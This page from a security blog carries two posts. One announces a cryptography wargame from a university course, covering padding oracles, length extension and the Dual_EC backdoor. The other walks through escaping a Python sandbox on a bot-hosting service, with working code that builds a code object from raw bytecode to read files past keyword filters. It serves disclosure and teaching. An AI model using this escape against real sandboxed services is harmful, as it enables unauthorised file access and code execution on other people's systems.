Pages

Tuesday, December 9, 2014

Blackbox: A Cryptography Wargame

 Intro.

This semester at RPI, I did an independent study called Practical Attacks Against Cryptosystems, based heavily around the Matasano Crypto Challenges. I have taken the two cryptography courses offered at RPI (and enjoyed both quite a bit!), but wanted to gain some more experience in identifying and exploiting "real world" cryptographic vulnerabilities, especially after interning at Matasano and hearing about just how common these issues are. The challenges do a great job of showcasing how seemingly minor implementation details can completely compromise systems that are cryptographically secure "on paper". If you're at all interested in these kinds of things, I highly recommend you take a look at them; they're quite approachable, you'll learn a ton, and they're fun!

As part of the independent study, I also made a series of CTF style problems for the Cryptography and Network Security class at RPI. The basic idea is that each challenge would be a simple server that had some cryptographic vulnerability students would have to exploit. Exploiting said vulnerability would either give you a flag, or allow you to decrypt ciphertext that contained one. Submitting the flag and solution code would get you extra credit points in the class. Most of the challenges were based directly on problems from the Matasano Crypto challenges, and they loosely followed the class's syllabus.

The Wargame.

The prime motivation for creating this was to help "bridge the gap" between theory and practice in a hopefully entertaining way. The vast majority of class time is spent learning about cryptographic primitives, getting exposed to some of the underlying mathematics, and implementing various algorithms. Weaknesses and vulnerabilities were discussed, but there wasn't an interactive component until the very end of the semester (a very cool final project that involves students implementing and attacking custom Bank-ATM protocols). This wargame was somewhat of a buffer that would hopefully get people "thinking like a bad guy" throughout the semester.

Overall, the system worked really well.  There was a core group of students that completed almost every challenge, and nearly every challenge had several solutions from students that were outside that group. Occasionally, someone would find a bug in my code or come up with an unexpected solution. It was certainly a learning experience for me.

Now that the semester is over, I've decided to package up and release the "wargame" on github. I don't have the time or resources to keep the server up indefinitely, but hopefully the code can be reused by others. Below is a list of topics that the wargame covers:
  • ECB Cut and Paste
  • CBC Bitflipping
  • CBC Padding Oracle
  • Poor Random Number Generation
  • PRNG Internal State Recreation
  • Length Extension Attack
  • Dual_EC_DRBG Backdoor

Final Thoughts.

Included in the github repo is a collection containing source code for the servers.  blackbox.pwnz.org is the server that hosted the wargame during the semester. As of right now, the server is still up and hosting all of the challenges, so feel free to poke at them. They are accessible at Ports 9000 --> 9007. I don't promise they'll be up forever, but I won't immediately take them down either.

I decided not to include solutions since hopefully, some variant of this wargame will continue being used (at least at RPI, and maybe elsewhere). If you'd like to use the wargame as an education tool, or you want to host the challenges as part of your own wargame, get in touch and I can send you the solution code.

 The Github Repo!



Saturday, September 6, 2014

Bypassing a python sandbox by abusing code objects

Awhile ago, I stumbled upon a service that let you write python-bots to interact with a number of external services. The basic idea was that you only had to worry about your logic, and they would provide a wrapper around API's and take care of hosting the bot for a monthly fee.

Python "Jail" or sandbox escapes are fairly common in CTFs, and I knew that there are all sorts of "magical" ways of doing things in python, so I decided to poke around a bit. Sure enough, I found a way of circumventing the sandbox and getting (kind of) arbitrary python to run. I've since talked to the founder about this, and they've taken steps to mitigate the damage one could do, so I thought I'd talk about some real world python-chaos :).[Specifically, virtualization is used to protect the host system]. With the level of access I had, I'm fairly sure it was possible to get a shell, and from there, who knows...

The remainder of this post will describe the process of breaking out of the sandbox they set up. Everything was written/tested on python 2.7.6.

At face value, the service was stripped of most dangerous components fairly well:
  • "Fun" modules could not be imported (sys, os, etc)
  • "Fun" keywords/functions got your script thrown out (exec, open(), read(), compile(), etc)
  • "Fun" attributes, nope! (myfunc.func_code)
  •  Fun stuff couldn't even be in static strings! (Annoying, but not really that important). 
The last point was the easiest to get around. Just send up a list of xor'd values, and dynamically build whatever string you need.
str1 = [30, 30, 35, 52, 40, 45, 53, 40, 47, 50, 30, 30]
for i in range(0,len(str1)):
        str1[i] = chr(str1[i] ^ 0x41)
str1 = ''.join(str1)
That gets us around most of the basic string-matching, but it still doesn't let us do anything interesting. The rest of the exploit relies on code objects. If you're not familiar with them, this is a great overview

So, normally, python allows you to access all the guts of functions. A Function is basically a wrapper for a code-object, and (as the name implies) you can access and modify these objects as you like. The python interpreter acts as a sort of VM, fetching and executing bytecode found inside code-objects. Python bytecode is assembly-ish. You can take a look here if you want to play around

At first, its tempting to just try directly modifying a dummy function's bytecode. However, that requires accessing the "func_code" member, which is explicitly blocked. Additionally, just modifying bytecode wouldn't be enough.  Fortunately, it /was/ possible to get access to a code-object.
cdbj = type(myfunc.__code__)

Now that we have a dummy code object, we can proceed to fill it in, and slide it into an empty function. The question at this point, is what do we fill it in with?
>>> dir(f.__code__)
['__class__', '__cmp__', '__delattr__', '__doc__', '__eq__', '__format__', '__ge__', 
'__getattribute__','__gt__', '__hash__', '__init__', '__le__', '__lt__', '__ne__', '__new__'
, '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', 
'__subclasshook__', 'co_argcount', 'co_cellvars', 'co_code', 'co_consts', 'co_filename', 
'co_firstlineno', 'co_flags', 'co_freevars', 'co_lnotab', 'co_name', 'co_names', 'co_nlocals', 
'co_stacksize', 'co_varnames']

So, that looks a bit intimidating, but really, we're only interested in a few of these. Specifically, I used
  • co_code: string of raw compiled bytecode
  • co_consts: tuple of constants used in the bytecode 
  • co_names: tuple of names of local variables
  Most of the others are documented here if you want to take a look. 
I had an info-leak that gave me the path of an interesting file, so I wanted my bytecode to basically do: open(<filename).read().

You can inspect bytecode in a user-friendly-ish way by using the dis module. This makes it easier to understand the fields we'll be filling in.

import dis
def read():
        return open("./poc.py",'r').read()

dis.dis(read.__code__)
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
 28           0 LOAD_GLOBAL              0 (open)
              3 LOAD_CONST               1 ('./poc.py')
              6 LOAD_CONST               2 ('r')
              9 CALL_FUNCTION            2
             12 LOAD_ATTR                1 (read)
             15 CALL_FUNCTION            0
             18 RETURN_VALUE        
Now, to actually access the bytecode that results in this:
bytecode = read.__code__.co_code
print bytecode.encode('hex')
>>> 7400006401006402008302006a010083000053
This gives us all the necessary pieces to create our code object. We can slide in our values like this:
code = type(myfunc.__code__)        #Get a Code Object
bytecode = "7400006401006402008302006a010083000053".decode('hex')   #Get our bytecode
filename = "./poc.py"             #Set our filename
consts = (None,filename,'r')      #Set up our constants
names = ('open','read')           #Set up our names
#Slide our values into the code object.
codeobj = code(0, 0, 3, 64, bytecode, consts, names, (), 'noname', '<module>', 1, '', (), ()) 
Great! Now we've created a code object with our desired functionality, without using anything that would trigger alerts. The only thing left to do is finding a way to execute it! Thankfully, functions in python are quite malleable. You can read about all their attributes here.
First, we start off with an empty, "dummy" function, and obtain a variable of type "function" that we can modify.
def f():
    pass
function = type(f)
Turns out there's one more major thing we need to do before we can slide in our code object. Python functions have a __globals__ attribute. This is described in the python documentation as: 

A reference to the dictionary that holds the function’s global variables — the global namespace of the module in which the function was defined.
Since the only thing we're worried about in our function is using the open() and read() built-in calls, we can create this dictionary easily enough.
import __builtin__
mydict = {}
mydict["__builtins__"] = __builtin__
At this point, the only thing left to do is put all the pieces together. Using the "function" variable we created before:
return function(codeobj, mydict, None, None, None)

So, in conclusion, we've created a code object and devised a way of executing it. Obviously, it is possible to block a few more keywords and stop this attack from being possible, but it highlights the difficulty of getting this sort of thing right.

For some ideas of taking this to the next level, take a look at this CTF writeup that discusses using a read/write primitive to obtain shell-level remote code execution on the host system. Certainly something to keep in mind.

Actually getting this to execute on similar production environments will probably require a bit more obfuscation/creativity. However, I've put together an example script that ties together all the steps explained here into a simple package that you should be able to execute and play with locally. Enjoy! :)